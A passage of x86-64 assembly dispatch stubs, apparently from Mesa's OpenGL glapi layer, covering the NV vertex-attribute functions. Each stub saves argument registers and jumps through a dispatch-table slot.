GL_PREFIX(VertexAttrib1fNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5432(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 5432(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5432(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 5432(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib1fNV), .-GL_PREFIX(VertexAttrib1fNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib1fvNV)
.type GL_PREFIX(VertexAttrib1fvNV), @function
GL_PREFIX(VertexAttrib1fvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5440(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5440(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5440(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5440(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib1fvNV), .-GL_PREFIX(VertexAttrib1fvNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib1sNV)
.type GL_PREFIX(VertexAttrib1sNV), @function
GL_PREFIX(VertexAttrib1sNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5448(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5448(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5448(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5448(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib1sNV), .-GL_PREFIX(VertexAttrib1sNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib1svNV)
.type GL_PREFIX(VertexAttrib1svNV), @function
GL_PREFIX(VertexAttrib1svNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5456(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5456(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5456(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5456(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib1svNV), .-GL_PREFIX(VertexAttrib1svNV)
/* glVertexAttrib2dNV dispatch stub: tail-jumps through dispatch-table
 * slot 683 (byte offset 5464).  Non-TLS paths spill %rdi and the
 * call-clobbered FP argument registers %xmm0/%xmm1 to a 24-byte
 * temporary frame across the lookup call (entry %rsp is 8 mod 16, so
 * subtracting 24 keeps the call site 16-byte aligned). */
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib2dNV)
.type GL_PREFIX(VertexAttrib2dNV), @function
GL_PREFIX(VertexAttrib2dNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5464(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 5464(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5464(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 5464(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib2dNV), .-GL_PREFIX(VertexAttrib2dNV)
/* glVertexAttrib2dvNV dispatch stub: tail-jumps through dispatch-table
 * slot 684 (byte offset 5472).  Non-TLS paths save %rdi/%rsi around
 * the lookup call; the %rbp push is stack-alignment padding. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib2dvNV)
.type GL_PREFIX(VertexAttrib2dvNV), @function
GL_PREFIX(VertexAttrib2dvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5472(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5472(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5472(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5472(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib2dvNV), .-GL_PREFIX(VertexAttrib2dvNV)
/* glVertexAttrib2fNV dispatch stub: tail-jumps through dispatch-table
 * slot 685 (byte offset 5480).  Non-TLS paths spill %rdi and the
 * call-clobbered FP argument registers %xmm0/%xmm1 to a 24-byte
 * temporary frame across the lookup call (keeps the call site
 * 16-byte aligned). */
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib2fNV)
.type GL_PREFIX(VertexAttrib2fNV), @function
GL_PREFIX(VertexAttrib2fNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5480(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 5480(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5480(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 5480(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib2fNV), .-GL_PREFIX(VertexAttrib2fNV)
/* glVertexAttrib2fvNV dispatch stub: tail-jumps through dispatch-table
 * slot 686 (byte offset 5488).  Non-TLS paths save %rdi/%rsi around
 * the lookup call; the %rbp push is stack-alignment padding. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib2fvNV)
.type GL_PREFIX(VertexAttrib2fvNV), @function
GL_PREFIX(VertexAttrib2fvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5488(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5488(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5488(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5488(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib2fvNV), .-GL_PREFIX(VertexAttrib2fvNV)
/* glVertexAttrib2sNV dispatch stub: tail-jumps through dispatch-table
 * slot 687 (byte offset 5496).  Non-TLS paths save the three live
 * argument registers %rdi/%rsi/%rdx; three pushes already keep %rsp
 * 16-byte aligned at the lookup call, so no padding push is needed. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib2sNV)
.type GL_PREFIX(VertexAttrib2sNV), @function
GL_PREFIX(VertexAttrib2sNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5496(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5496(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5496(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5496(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib2sNV), .-GL_PREFIX(VertexAttrib2sNV)
/* glVertexAttrib2svNV dispatch stub: tail-jumps through dispatch-table
 * slot 688 (byte offset 5504).  Non-TLS paths save %rdi/%rsi around
 * the lookup call; the %rbp push is stack-alignment padding. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib2svNV)
.type GL_PREFIX(VertexAttrib2svNV), @function
GL_PREFIX(VertexAttrib2svNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5504(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5504(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5504(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5504(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib2svNV), .-GL_PREFIX(VertexAttrib2svNV)
/* glVertexAttrib3dNV dispatch stub: tail-jumps through dispatch-table
 * slot 689 (byte offset 5512).  Non-TLS paths spill %rdi and the
 * call-clobbered FP argument registers %xmm0-%xmm2 to a 40-byte
 * temporary frame across the lookup call (keeps the call site
 * 16-byte aligned). */
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib3dNV)
.type GL_PREFIX(VertexAttrib3dNV), @function
GL_PREFIX(VertexAttrib3dNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5512(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 5512(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5512(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 5512(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib3dNV), .-GL_PREFIX(VertexAttrib3dNV)
/* glVertexAttrib3dvNV dispatch stub: tail-jumps through dispatch-table
 * slot 690 (byte offset 5520).  Non-TLS paths save %rdi/%rsi around
 * the lookup call; the %rbp push is stack-alignment padding. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib3dvNV)
.type GL_PREFIX(VertexAttrib3dvNV), @function
GL_PREFIX(VertexAttrib3dvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5520(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5520(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5520(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5520(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib3dvNV), .-GL_PREFIX(VertexAttrib3dvNV)
/* glVertexAttrib3fNV dispatch stub: tail-jumps through dispatch-table
 * slot 691 (byte offset 5528).  Non-TLS paths spill %rdi and the
 * call-clobbered FP argument registers %xmm0-%xmm2 to a 40-byte
 * temporary frame across the lookup call (keeps the call site
 * 16-byte aligned). */
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib3fNV)
.type GL_PREFIX(VertexAttrib3fNV), @function
GL_PREFIX(VertexAttrib3fNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5528(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 5528(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5528(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 5528(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib3fNV), .-GL_PREFIX(VertexAttrib3fNV)
/* glVertexAttrib3fvNV dispatch stub: tail-jumps through dispatch-table
 * slot 692 (byte offset 5536).  Non-TLS paths save %rdi/%rsi around
 * the lookup call; the %rbp push is stack-alignment padding. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib3fvNV)
.type GL_PREFIX(VertexAttrib3fvNV), @function
GL_PREFIX(VertexAttrib3fvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5536(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5536(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5536(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5536(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib3fvNV), .-GL_PREFIX(VertexAttrib3fvNV)
/* glVertexAttrib3sNV dispatch stub: tail-jumps through dispatch-table
 * slot 693 (byte offset 5544).  Non-TLS paths save the four live
 * argument registers %rdi/%rsi/%rdx/%rcx around the lookup call; the
 * fifth push of %rbp is 16-byte stack-alignment padding. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib3sNV)
.type GL_PREFIX(VertexAttrib3sNV), @function
GL_PREFIX(VertexAttrib3sNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5544(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5544(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5544(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5544(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib3sNV), .-GL_PREFIX(VertexAttrib3sNV)
/* glVertexAttrib3svNV dispatch stub: tail-jumps through dispatch-table
 * slot 694 (byte offset 5552).  Non-TLS paths save %rdi/%rsi around
 * the lookup call; the %rbp push is stack-alignment padding. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib3svNV)
.type GL_PREFIX(VertexAttrib3svNV), @function
GL_PREFIX(VertexAttrib3svNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5552(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5552(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5552(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5552(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib3svNV), .-GL_PREFIX(VertexAttrib3svNV)
/* glVertexAttrib4dNV dispatch stub: tail-jumps through dispatch-table
 * slot 695 (byte offset 5560).  Non-TLS paths spill %rdi and the
 * call-clobbered FP argument registers %xmm0-%xmm3 to a 40-byte
 * temporary frame across the lookup call (keeps the call site
 * 16-byte aligned). */
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4dNV)
.type GL_PREFIX(VertexAttrib4dNV), @function
GL_PREFIX(VertexAttrib4dNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5560(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
movq %xmm3, 32(%rsp)
call _x86_64_get_dispatch@PLT
movq 32(%rsp), %xmm3
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 5560(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5560(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
movq %xmm3, 32(%rsp)
call _glapi_get_dispatch
movq 32(%rsp), %xmm3
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 5560(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4dNV), .-GL_PREFIX(VertexAttrib4dNV)
/* glVertexAttrib4dvNV dispatch stub: tail-jumps through dispatch-table
 * slot 696 (byte offset 5568).  Non-TLS paths save %rdi/%rsi around
 * the lookup call; the %rbp push is stack-alignment padding. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4dvNV)
.type GL_PREFIX(VertexAttrib4dvNV), @function
GL_PREFIX(VertexAttrib4dvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5568(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5568(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5568(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5568(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4dvNV), .-GL_PREFIX(VertexAttrib4dvNV)
/* glVertexAttrib4fNV dispatch stub: tail-jumps through dispatch-table
 * slot 697 (byte offset 5576).  Non-TLS paths spill %rdi and the
 * call-clobbered FP argument registers %xmm0-%xmm3 to a 40-byte
 * temporary frame across the lookup call (keeps the call site
 * 16-byte aligned). */
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4fNV)
.type GL_PREFIX(VertexAttrib4fNV), @function
GL_PREFIX(VertexAttrib4fNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5576(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
movq %xmm3, 32(%rsp)
call _x86_64_get_dispatch@PLT
movq 32(%rsp), %xmm3
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 5576(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5576(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
movq %xmm3, 32(%rsp)
call _glapi_get_dispatch
movq 32(%rsp), %xmm3
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 5576(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4fNV), .-GL_PREFIX(VertexAttrib4fNV)
/* glVertexAttrib4fvNV dispatch stub: tail-jumps through dispatch-table
 * slot 698 (byte offset 5584).  Non-TLS paths save %rdi/%rsi around
 * the lookup call; the %rbp push is stack-alignment padding. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4fvNV)
.type GL_PREFIX(VertexAttrib4fvNV), @function
GL_PREFIX(VertexAttrib4fvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5584(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5584(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5584(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5584(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4fvNV), .-GL_PREFIX(VertexAttrib4fvNV)
/* glVertexAttrib4sNV dispatch stub: tail-jumps through dispatch-table
 * slot 699 (byte offset 5592).  Non-TLS paths save the five live
 * argument registers %rdi/%rsi/%rdx/%rcx/%r8; five pushes keep %rsp
 * 16-byte aligned at the lookup call, so no padding push is needed. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4sNV)
.type GL_PREFIX(VertexAttrib4sNV), @function
GL_PREFIX(VertexAttrib4sNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5592(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5592(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5592(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5592(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4sNV), .-GL_PREFIX(VertexAttrib4sNV)
/* glVertexAttrib4svNV dispatch stub: tail-jumps through dispatch-table
 * slot 700 (byte offset 5600).  Non-TLS paths save %rdi/%rsi around
 * the lookup call; the %rbp push is stack-alignment padding. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4svNV)
.type GL_PREFIX(VertexAttrib4svNV), @function
GL_PREFIX(VertexAttrib4svNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5600(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5600(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5600(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5600(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4svNV), .-GL_PREFIX(VertexAttrib4svNV)
/* glVertexAttrib4ubNV dispatch stub: tail-jumps through dispatch-table
 * slot 701 (byte offset 5608).  Non-TLS paths save the five live
 * argument registers %rdi/%rsi/%rdx/%rcx/%r8; five pushes keep %rsp
 * 16-byte aligned at the lookup call. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4ubNV)
.type GL_PREFIX(VertexAttrib4ubNV), @function
GL_PREFIX(VertexAttrib4ubNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5608(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5608(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5608(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5608(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4ubNV), .-GL_PREFIX(VertexAttrib4ubNV)
/* glVertexAttrib4ubvNV dispatch stub: tail-jumps through
 * dispatch-table slot 702 (byte offset 5616).  Non-TLS paths save
 * %rdi/%rsi around the lookup call; the %rbp push is stack-alignment
 * padding. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4ubvNV)
.type GL_PREFIX(VertexAttrib4ubvNV), @function
GL_PREFIX(VertexAttrib4ubvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5616(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5616(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5616(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5616(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4ubvNV), .-GL_PREFIX(VertexAttrib4ubvNV)
/* glVertexAttribPointerNV dispatch stub: tail-jumps through
 * dispatch-table slot 703 (byte offset 5624).  Non-TLS paths save the
 * five live argument registers %rdi/%rsi/%rdx/%rcx/%r8; five pushes
 * keep %rsp 16-byte aligned at the lookup call. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttribPointerNV)
.type GL_PREFIX(VertexAttribPointerNV), @function
GL_PREFIX(VertexAttribPointerNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5624(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5624(%rax), %r11
